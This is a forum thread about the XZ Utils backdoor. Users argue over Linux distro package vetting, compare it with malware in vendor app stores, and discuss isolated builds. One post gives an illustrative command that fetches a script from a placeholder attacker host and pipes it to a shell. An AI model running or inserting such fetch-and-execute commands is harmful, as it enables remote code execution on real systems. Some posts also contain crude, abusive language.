Announcement

**F.Ultra** · 29 March 2024, 08:03 PM

Originally posted by avis View Post

I've been talking about this issue for years and how woeful Linux (in)security is as a result. I knew something like that would happen and it just happened.

Almost all distros, aside from maybe RHEL, rush to push upstream packages without ever verifying that the source code has not been tampered with.

What's worse, independent maintainers assigned for packaging , are often not even developers themselves, so they have no means or qualifications to read the code and see if it's still trustworthy. And oftentimes maintainers are in charge of multiple packages, and at the same time it's not their primary job or something they get paid for, so there's little to no interest to make sure things are right.

Whereas big corporations such as Microsoft, Google or Apple endorse every line of code that reaches you as a customer, no such thing exists in the Linux world. And it's not limited to Linux, as FreeBSD is equally affected. I'm not sure about OpenBSD/NetBSD as I've never used those.

Can this issue be solved? I've no idea.

There should be a concerted effort by Linux distros to verify packages and mark them as safe. I've never heard of anything in this regard with the only exception of RHEL which is not a desktop distro and besides they have severely limited their ties to the community.

This is not an XZ issue. This is the issue of the entire Linux ecosystem. The issue of safety, security, trust and verifiability.

no one is immune from accidents:

https://www.cnet.com/tech/tech-industry/microsoft-accidentally-distributes-virus/

Microsoft admits to signing rootkit malware in supply-chain fiasco

https://www.bleepingcomputer.com/news/security/microsoft-admits-to-signing-rootkit-malware-in-supply-chain-fiasco/

Microsoft has now confirmed signing a malicious driver being distributed within gaming environments. This driver, called "Netfilter," is in fact a rootkit that was observed communicating with Chinese command-and-control IPs.

Apple accidentally approved malware disguised as Flash, new report finds

https://www.theverge.com/2020/8/31/21408991/apple-approves-common-malware-shlayer-macos-adware

The tech giant accidentally approved a trojan downloader as a safe macOS app.

How 18 Malware Apps Snuck Into Apple's App Store

https://www.wired.com/story/apple-app-store-malware-click-fraud/

Sing it loud: The App Store's not perfect. Especially when it's up against click fraud code this clever.

Beware of Malicious 7ZIP on the Microsoft App Store that Delivers Malware

https://cybersecuritynews.com/malicious-7zip-on-microsoft-app-store/

Hackers target 7ZIP due to its widespread use and popularity, making it a lucrative vector for spreading malware.

Malware infiltrates Microsoft Store via clones of popular games

https://www.bleepingcomputer.com/news/security/malware-infiltrates-microsoft-store-via-clones-of-popular-games/

A malware named Electron Bot has found its way into Microsoft's Official Store through clones of popular games such as Subway Surfer and Temple Run, leading to the infection of 5,000 computers in Sweden, Israel, Spain, and Bermuda.

And before you complain about the later links, the Apple and Microsoft app stores are exactly their 1:1 equivalent of the app repository in Linux.

**novideo** · 29 March 2024, 08:17 PM

Originally posted by avis View Post

I have nothing else to say and I'm exhausted by the aggression of the people who have made Linux their religion.

птичка (I assume your English name is supposed to be a translation of that?), the thing is, you are very good at attracting the "aggression." This is the first post in the argument:

Originally posted by avis View Post

I've been talking about this issue for years and how woeful Linux (in)security is as a result. I knew something like that would happen and it just happened.

Almost all distros, aside from maybe RHEL, rush to push upstream packages without ever verifying that the source code has not been tampered with.

What's worse, independent maintainers assigned for packaging , are often not even developers themselves, so they have no means or qualifications to read the code and see if it's still trustworthy. And oftentimes maintainers are in charge of multiple packages, and at the same time it's not their primary job or something they get paid for, so there's little to no interest to make sure things are right.

Whereas big corporations such as Microsoft, Google or Apple endorse every line of code that reaches you as a customer, no such thing exists in the Linux world. And it's not limited to Linux, as FreeBSD is equally affected. I'm not sure about OpenBSD/NetBSD as I've never used those.

Can this issue be solved? I've no idea.

There should be a concerted effort by Linux distros to verify packages and mark them as safe. I've never heard of anything in this regard with the only exception of RHEL which is not a desktop distro and besides they have severely limited their ties to the community.

This is not an XZ issue. This is the issue of the entire Linux ecosystem. The issue of safety, security, trust and verifiability.

This is not exactly the right tone if you are really seeking to avoid an argument.

And the claim about Microsoft/Google/Apple is laughable and not a fair comparison anyway as none of the even somewhat LTS distros are affected by this backdoor. I on Debian Sid and Devuan Ceres got the vulnerable XZ but don't have sshd installed on either machine, and the Devuan machine doesn't even have libsystemd0 though I'm not sure if libelogind0 was affected. Arch and Tumbleweed users also got hit, and that is the risk we rolling release users are willing to take, and the fact we caught it before it trickled down shows free software working as intended. This backdoor would have been possible with proprietary software and even harder to find. I recall reading something about a vulnerability in WebKit that was fixed upstream within a day of it being reported, but Safari didn't get the fix until macOS's annual release cycle. Unfortunately that was a couple years ago and I've since lost the article. That being said this backdoor is extremely serious and something has to be changed.

**avis** · 29 March 2024, 08:18 PM

Originally posted by F.Ultra View Post

no one is immune from accidents:

URLS

And before you complain about the later links, the Apple and Microsoft app stores are exactly their 1:1 equivalent of the app repository in Linux.

1. They signed someone else's code. They did not distribute anything themselves.
2. Ditto.
3. Not Apple's own software.
4. Ditto.
5. Not Microsoft's own software.
6. Ditto.

For examples of Linux "stores" willingly distributing actual malware look no further, only there will be a ton more than that:

1. https://popey.com/blog/2024/03/exodu...et-part-three/
2. https://checkmarx.com/blog/pypi-is-u...ion-suspended/

This is for the past two weeks alone.

There have been countless more instances of malware in Python, NPM, Ruby, etc. "stores". Don't start this please.

**iggy** · 29 March 2024, 08:28 PM

This forum really needs the ability to ignore users. This 13 page thread of mostly useless bickering would probably only be a page or two tops if only I could ignore two or three users.

**avis** · 29 March 2024, 08:30 PM

Originally posted by iggy View Post

This forum really needs the ability to ignore users. This 13 page thread of mostly useless bickering would probably only be a page or two tops if only I could ignore two or three users.

Not a single comment here has been technical so far.

1. "An isolated accident, all good!"
2. "I don't have this package installed, all good!"
3. "Windows is worse, all good!"

That's the level of the discussion that you can enjoy here.

For the actual technical discussion you're welcome to:
1. https://arstechnica.com/security/202...ns/?comments=1
2. https://gist.github.com/thesamesam/2...e9ee78baad9e27
3. https://lwn.net/Articles/967180/#Comments
4. https://news.ycombinator.com/item?id=39865810

I've already posted these links earlier but you chose to ignore them. Have a nice day.

Here's some interesting and scary stuff:

rwmj 7 hours ago | prev | next [–]

Very annoying - the apparent author of the backdoor was in communication with me over several weeks trying to get xz 5.6.x added to Fedora 40 & 41 because of it's "great new features". We even worked with him to fix the valgrind issue (which it turns out now was caused by the backdoor he had added). We had to race last night to fix the problem after an inadvertent break of the embargo.

He has been part of the xz project for 2 years, adding all sorts of binary test files, and to be honest with this level of sophistication I would be suspicious of even older versions of xz until proven otherwise.

It's for all those people who claim "We are safe!".

**caligula** · 29 March 2024, 08:40 PM

Originally posted by avis View Post

The build system is irrelevant. You can obfuscate whatever you want and run wget https://bad.server/script.sh && sh script.sh and do whatever you please.

All the code Linux distros include must be manually inspected (and run through automated systems as well, since people don't always catch/see everything) and verified for being safe, period.

I usually build packages in a nspawn container with network disabled.

**avis** · 29 March 2024, 08:44 PM

Originally posted by caligula View Post

I usually build packages in a nspawn container with network disabled.

That's the right way to do it but many projects have external build-time dependencies which are often downloaded via the Internet.

And then, imagine whatever you're trying to build already contains malware (at source level). OK, you've now compiled malware which will activate as soon as it's used/launched.

Building in an isolated environment with no Internet is not a panacea unfortunately.

**caligula** · 29 March 2024, 08:46 PM

Originally posted by edxposed View Post

None of this would have happened if they had completely replaced autotools with CMake in the first place.

Cmake can do it as well. The only advantage of autohell here is that the code looks like piece of shit. You typically want to kill yourself if you're forced to work with them. So that greatly makes the audit process more difficult. In the Java world gradle is similar. Groovy is a piece of turd language and the groovy based gradle scripts are built by braindead monkeys. Scala has similar kind of cunt favoring shit build systems like SBT. Docker files are also problematic on many ways. There was an article in lwn just recently about nix.

**Blademasterz** · 29 March 2024, 08:51 PM

in case you guys missed this

**caligula** · 29 March 2024, 08:54 PM

Originally posted by avis View Post

That's the right way to do it but many projects have external build-time dependencies which are often downloaded via the Internet.

And then, imagine whatever you're trying to build already contains malware (at source level). OK, you've now compiled malware which will activate as soon as it's used/launched.

Building in an isolated environment with no Internet is not a panacea unfortunately.

Yes I know. I don't like this kind of software at all. Especially scripts that download stuff and immediately run it look suspicious as hell. Libraries should be isolated much more. Instead of binary linking, something like xz should be a source/sink for pipes, nothing more. If you need directory listing, there should be an isolated API.

Announcement

XZ Struck By Malicious Code That Could Allow Unauthorized Remote System Access

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment